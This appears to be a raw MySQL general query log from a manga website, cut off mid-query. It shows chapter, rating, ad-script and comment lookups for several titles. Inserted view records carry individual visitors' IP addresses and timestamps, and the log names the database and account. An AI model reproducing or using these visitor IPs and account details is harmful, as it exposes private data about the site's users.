330638027 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330638027 Quit 330638028 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638028 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '303' order by created desc 330638028 Quit 330638029 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638030 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638029 Quit 330638030 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330638030 Quit 330638031 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638032 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638031 Quit 330638032 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '7059' and m.active = 1 330638032 Quit 330638033 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638033 Query select * FROM chapters where id = '7059' 330638033 Quit 330638034 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638034 Query select * FROM chapters where manga_id = '183' order by display_priority ASC, id desc 330638034 Quit 330638035 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638035 Query Update chapters set view=view+1 where id = '7059' 330638035 Quit 330638036 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638036 Query select * FROM chapters where id = '7059' 330638037 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638036 Quit 330638037 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '7059' and m.active = 1 330638037 Quit 330638038 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638038 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('183', '7059', '15.235.27.173', 'mangaberri.com', '2026-02-26 03:27:55', '2026-02-26 03:27:55') 330638038 Quit 330638039 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638039 Query select * FROM chapter_images where chapter_id = '7059' 330638039 Quit 330638040 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638040 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '183' and m.active = 1 330638040 Quit 330638041 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638041 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='183' and m.active = 1 AND (genres like '%Drama%' OR genres like '%Ecchi%' OR genres like '%Fantasy%') ORDER BY RAND() limit 10 330638041 Quit 330638042 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638043 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638042 Quit 330638043 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330638043 Quit 330638044 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638045 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638044 Quit 330638045 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330638045 Quit 330638046 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638047 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638046 Quit 330638047 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330638047 Quit 330638048 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638049 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638048 Quit 330638049 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330638049 Quit 330638050 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638051 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638050 Quit 330638051 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '343' and m.active = 1 330638052 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638052 Query select * FROM chapters where id = '343' 330638051 Quit 330638052 Quit 330638053 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638053 Query select * FROM chapters where manga_id = '22' order by display_priority ASC, id desc 330638053 Quit 330638054 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638054 Query Update chapters set view=view+1 where id = '343' 330638055 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638055 Query select * FROM chapters where id = '343' 330638054 Quit 330638056 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638056 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '343' and m.active = 1 330638055 Quit 330638056 Quit 330638057 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638057 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('22', '343', '107.77.206.202', 'mangaberri.com', '2026-02-26 03:27:55', '2026-02-26 03:27:55') 330638057 Quit 330638058 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638058 Query select * FROM chapter_images where chapter_id = '343' 330638058 Quit 330638059 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638059 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '22' and m.active = 1 330638059 Quit 330638060 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638060 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='22' and m.active = 1 AND (genres like '%Action%' OR genres like '%Demons%' OR genres like '%Drama%' OR genres like '%Magic%' OR genres like '%Martial Arts%' OR genres like '%School%' OR genres like '%Shounen%' OR genres like '%Super Power%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330638060 Quit 330638061 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638062 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638061 Quit 330638062 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330638062 Quit 330638063 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638064 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638063 Quit 330638064 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330638064 Quit 330638065 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638066 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638065 Quit 330638066 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330638066 Quit 330638067 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638068 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638067 Quit 330638068 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330638068 Quit 260225 19:27:56 330638069 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638070 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638069 Quit 330638070 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '10380' and m.active = 1 330638070 Quit 330638071 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638071 Query select * FROM chapters where id = '10380' 330638071 Quit 330638072 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638072 Query select * FROM chapters where manga_id = '218' order by display_priority ASC, id desc 330638072 Quit 330638073 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638073 Query Update chapters set view=view+1 where id = '10380' 330638073 Quit 330638074 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638074 Query select * FROM chapters where id = '10380' 330638075 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638074 Quit 330638075 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '10380' and m.active = 1 330638075 Quit 330638076 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638076 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('218', '10380', '1.38.1.120', 'mangaberri.com', '2026-02-26 03:27:56', '2026-02-26 03:27:56') 330638076 Quit 330638077 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638077 Query select * FROM chapter_images where chapter_id = '10380' 330638077 Quit 330638078 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638078 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '218' and m.active = 1 330638078 Quit 330638079 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638079 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='218' and m.active = 1 AND (genres like '%Action%' OR genres like '%Comedy%' OR genres like '%Martial Arts%' OR genres like '%Parody%' OR genres like '%Sci-Fi%' OR genres like '%Seinen%' OR genres like '%Shounen%' OR genres like '%Super Power%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330638079 Quit 330638080 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638081 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638080 Quit 330638081 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330638081 Quit 330638082 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638083 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638082 Quit 330638083 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330638083 Quit 330638084 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638085 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638084 Quit 330638085 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330638085 Quit 330638086 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638087 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638086 Quit 330638087 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330638087 Quit 330638088 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638089 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638088 Quit 330638089 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.active = 1 AND REGEXP_REPLACE(REPLACE(LOWER(m.title), ' ', '-'), '[^a-z0-9-]', '') = 'boruto-two-blue-vortex-manga-' 330638089 Quit 330638090 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638090 Query select * FROM chapters where manga_id = '25' order by display_priority ASC, id desc 330638090 Quit 330638091 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638091 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '25' and m.active = 1 330638091 Quit 330638092 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638092 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='25' and m.active = 1 AND (genres like '%Action%' OR genres like '%Adventure%' OR genres like '%Fantasy%' OR genres like '%Martial Arts%' OR genres like '%Shounen%' OR genres like '%Super Power%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330638092 Quit 330638093 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638093 Query select * FROM comments where manga_id = '25' and parent_id is null order by created desc 330638093 Quit 330638094 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638094 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '25' and m.active = 1 330638094 Quit 330638095 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638095 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) AND (m.genres like '%Action%' OR m.genres like '%Adventure%' OR m.genres like '%Fantasy%' OR m.genres like '%Martial Arts%' OR m.genres like '%Shounen%' OR m.genres like '%Super Power%' OR m.genres like '%Supernatural%') where m.active = 1 group by manga_id ORDER BY sum(view) DESC 330638095 Quit 330638096 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638097 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638096 Quit 330638097 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330638097 Quit 330638098 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638098 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '25' order by created desc 330638098 Quit 330638099 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638099 Query select * FROM chapters where manga_id = '25' order by created desc limit 1 330638099 Quit 330638100 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638100 Query select * FROM comments where parent_id = '4524' 330638100 Quit 330638101 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638101 Query select * FROM comments where parent_id = '4518' 330638101 Quit 330638102 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638102 Query select * FROM comments where parent_id = '4515' 330638102 Quit 330638103 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638103 Query select * FROM comments where parent_id = '4513' 330638103 Quit 330638104 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638104 Query select * FROM comments where parent_id = '4274' 330638104 Quit 330638105 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638105 Query select * FROM comments where parent_id = '4262' 330638105 Quit 330638106 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638106 Query select * FROM comments where parent_id = '4156' 330638106 Quit 330638107 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638107 Query select * FROM comments where parent_id = '3988' 330638107 Quit 330638108 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638108 Query select * FROM comments where parent_id = '3989' 330638108 Quit 330638109 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638109 Query select * FROM comments where parent_id = '3977' 330638109 Quit 330638110 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638110 Query select * FROM comments where parent_id = '3976' 330638110 Quit 330638111 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638111 Query select * FROM comments where parent_id = '3514' 330638111 Quit 330638112 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638112 Query select * FROM comments where parent_id = '3069' 330638112 Quit 330638113 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638113 Query select * FROM comments where parent_id = '3059' 330638113 Quit 330638114 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638114 Query select * FROM comments where parent_id = '3052' 330638114 Quit 330638115 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638115 Query select * FROM comments where parent_id = '3051' 330638115 Quit 330638116 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638116 Query select * FROM comments where parent_id = '3004' 330638116 Quit 330638117 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638117 Query select * FROM comments where parent_id = '2959' 330638117 Quit 330638118 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638118 Query select * FROM comments where parent_id = '2955' 330638118 Quit 330638119 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638119 Query select * FROM comments where parent_id = '2847' 330638119 Quit 330638120 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638120 Query select * FROM comments where parent_id = '2846' 330638120 Quit 330638121 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638121 Query select * FROM comments where parent_id = '2844' 330638121 Quit 330638122 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638122 Query select * FROM comments where parent_id = '2843' 330638122 Quit 330638123 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638123 Query select * FROM comments where parent_id = '2841' 330638123 Quit 330638124 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638124 Query select * FROM comments where parent_id = '2840' 330638124 Quit 330638125 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638125 Query select * FROM comments where parent_id = '2839' 330638125 Quit 330638126 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638126 Query select * FROM comments where parent_id = '2838' 330638126 Quit 330638127 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638127 Query select * FROM comments where parent_id = '2837' 330638127 Quit 330638128 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638128 Query select * FROM comments where parent_id = '2836' 330638128 Quit 330638129 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638129 Query select * FROM comments where parent_id = '2835' 330638129 Quit 330638130 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638130 Query select * FROM comments where parent_id = '2834' 330638130 Quit 330638131 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638131 Query select * FROM comments where parent_id = '2833' 330638131 Quit 330638132 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638132 Query select * FROM comments where parent_id = '2832' 330638132 Quit 330638133 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638133 Query select * FROM comments where parent_id = '2831' 330638133 Quit 330638134 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638134 Query select * FROM comments where parent_id = '2830' 330638134 Quit 330638135 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638135 Query select * FROM comments where parent_id = '2829' 330638135 Quit 330638136 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638136 Query select * FROM comments where parent_id = '2828' 330638136 Quit 330638137 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638137 Query select * FROM comments where parent_id = '2827' 330638137 Quit 330638138 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638138 Query select * FROM comments where parent_id = '2826' 330638138 Quit 330638139 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638139 Query select * FROM comments where parent_id = '2825' 330638139 Quit 330638140 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638140 Query select * FROM comments where parent_id = '2824' 330638140 Quit 330638141 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638141 Query select * FROM comments where parent_id = '2823' 330638141 Quit 330638142 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638142 Query select * FROM comments where parent_id = '2822' 330638142 Quit 330638143 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638143 Query select * FROM comments where parent_id = '2821' 330638143 Quit 330638144 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638144 Query select * FROM comments where parent_id = '2820' 330638144 Quit 330638145 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638145 Query select * FROM comments where parent_id = '2819' 330638145 Quit 330638146 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638146 Query select * FROM comments where parent_id = '2818' 330638147 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638147 Query select * FROM comments where parent_id = '2817' 330638147 Quit 330638146 Quit 330638148 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638148 Query select * FROM comments where parent_id = '2816' 330638148 Quit 330638149 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638149 Query select * FROM comments where parent_id = '2815' 330638149 Quit 330638150 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638150 Query select * FROM comments where parent_id = '2814' 330638150 Quit 330638151 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638151 Query select * FROM comments where parent_id = '2813' 330638151 Quit 330638152 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638152 Query select * FROM comments where parent_id = '2812' 330638152 Quit 330638153 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638153 Query select * FROM comments where parent_id = '2811' 330638153 Quit 330638154 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638154 Query select * FROM comments where parent_id = '2810' 330638154 Quit 330638155 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638155 Query select * FROM comments where parent_id = '2809' 330638155 Quit 330638156 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638156 Query select * FROM comments where parent_id = '2808' 330638156 Quit 330638157 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638157 Query select * FROM comments where parent_id = '2807' 330638157 Quit 330638158 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638158 Query select * FROM comments where parent_id = '2806' 330638158 Quit 330638159 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638159 Query select * FROM comments where parent_id = '2805' 330638159 Quit 330638160 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638160 Query select * FROM comments where parent_id = '2804' 330638160 Quit 330638161 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638161 Query select * FROM comments where parent_id = '2803' 330638161 Quit 330638162 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638162 Query select * FROM comments where parent_id = '2802' 330638162 Quit 330638163 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638163 Query select * FROM comments where parent_id = '2801' 330638163 Quit 330638164 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638164 Query select * FROM comments where parent_id = '2800' 330638164 Quit 330638165 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638165 Query select * FROM comments where parent_id = '2798' 330638165 Quit 330638166 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638166 Query select * FROM comments where parent_id = '2799' 330638166 Quit 330638167 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638167 Query select * FROM comments where parent_id = '2797' 330638167 Quit 330638168 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638168 Query select * FROM comments where parent_id = '2796' 330638168 Quit 330638169 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638169 Query select * FROM comments where parent_id = '2795' 330638169 Quit 330638170 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638170 Query select * FROM comments where parent_id = '2794' 330638170 Quit 330638171 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638171 Query select * FROM comments where parent_id = '2793' 330638171 Quit 330638172 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638172 Query select * FROM comments where parent_id = '2792' 330638172 Quit 330638173 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638173 Query select * FROM comments where parent_id = '2791' 330638173 Quit 330638174 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638174 Query select * FROM comments where parent_id = '2790' 330638174 Quit 330638175 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638175 Query select * FROM comments where parent_id = '2789' 330638175 Quit 330638176 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638176 Query select * FROM comments where parent_id = '2788' 330638176 Quit 330638177 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638177 Query select * FROM comments where parent_id = '2787' 330638177 Quit 330638178 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638178 Query select * FROM comments where parent_id = '2786' 330638178 Quit 330638179 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638179 Query select * FROM comments where parent_id = '2784' 330638179 Quit 330638180 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638180 Query select * FROM comments where parent_id = '2785' 330638180 Quit 330638181 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638181 Query select * FROM comments where parent_id = '2783' 330638181 Quit 330638182 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638182 Query select * FROM comments where parent_id = '2782' 330638182 Quit 330638183 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638183 Query select * FROM comments where parent_id = '2781' 330638183 Quit 330638184 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638184 Query select * FROM comments where parent_id = '2780' 330638184 Quit 330638185 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638185 Query select * FROM comments where parent_id = '2778' 330638185 Quit 330638186 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638186 Query select * FROM comments where parent_id = '2776' 330638186 Quit 330638187 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638187 Query select * FROM comments where parent_id = '2777' 330638187 Quit 330638188 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638188 Query select * FROM comments where parent_id = '2775' 330638188 Quit 330638189 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638189 Query select * FROM comments where parent_id = '2774' 330638189 Quit 330638190 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638190 Query select * FROM comments where parent_id = '2773' 330638190 Quit 330638191 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638191 Query select * FROM comments where parent_id = '2772' 330638191 Quit 330638192 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638192 Query select * FROM comments where parent_id = '2771' 330638192 Quit 330638193 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638193 Query select * FROM comments where parent_id = '2770' 330638193 Quit 330638194 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638194 Query select * FROM comments where parent_id = '2769' 330638194 Quit 330638195 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638195 Query select * FROM comments where parent_id = '2768' 330638195 Quit 330638196 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638196 Query select * FROM comments where parent_id = '2767' 330638196 Quit 330638197 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638197 Query select * FROM comments where parent_id = '2766' 330638197 Quit 330638198 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638198 Query select * FROM comments where parent_id = '2762' 330638198 Quit 330638199 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638199 Query select * FROM comments where parent_id = '2701' 330638199 Quit 330638200 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638200 Query select * FROM comments where parent_id = '2655' 330638200 Quit 330638201 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638201 Query select * FROM comments where parent_id = '2634' 330638201 Quit 330638202 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638202 Query select * FROM comments where parent_id = '2572' 330638202 Quit 330638203 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638203 Query select * FROM comments where parent_id = '2555' 330638203 Quit 330638204 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638204 Query select * FROM comments where parent_id = '2537' 330638204 Quit 330638205 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638205 Query select * FROM comments where parent_id = '1675' 330638205 Quit 330638206 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638206 Query select * FROM comments where parent_id = '1658' 330638206 Quit 330638207 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638207 Query select * FROM comments where parent_id = '1657' 330638207 Quit 330638208 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638208 Query select * FROM comments where parent_id = '1386' 330638208 Quit 330638209 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638209 Query select * FROM comments where parent_id = '1346' 330638209 Quit 330638210 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638210 Query select * FROM comments where parent_id = '969' 330638210 Quit 330638211 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638211 Query select * FROM comments where parent_id = '970' 330638211 Quit 330638212 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638212 Query select * FROM comments where parent_id = '946' 330638212 Quit 330638213 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638213 Query select * FROM comments where parent_id = '947' 330638213 Quit 330638214 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638214 Query select * FROM comments where parent_id = '943' 330638214 Quit 330638215 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638215 Query select * FROM comments where parent_id = '944' 330638215 Quit 330638216 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638216 Query select * FROM comments where parent_id = 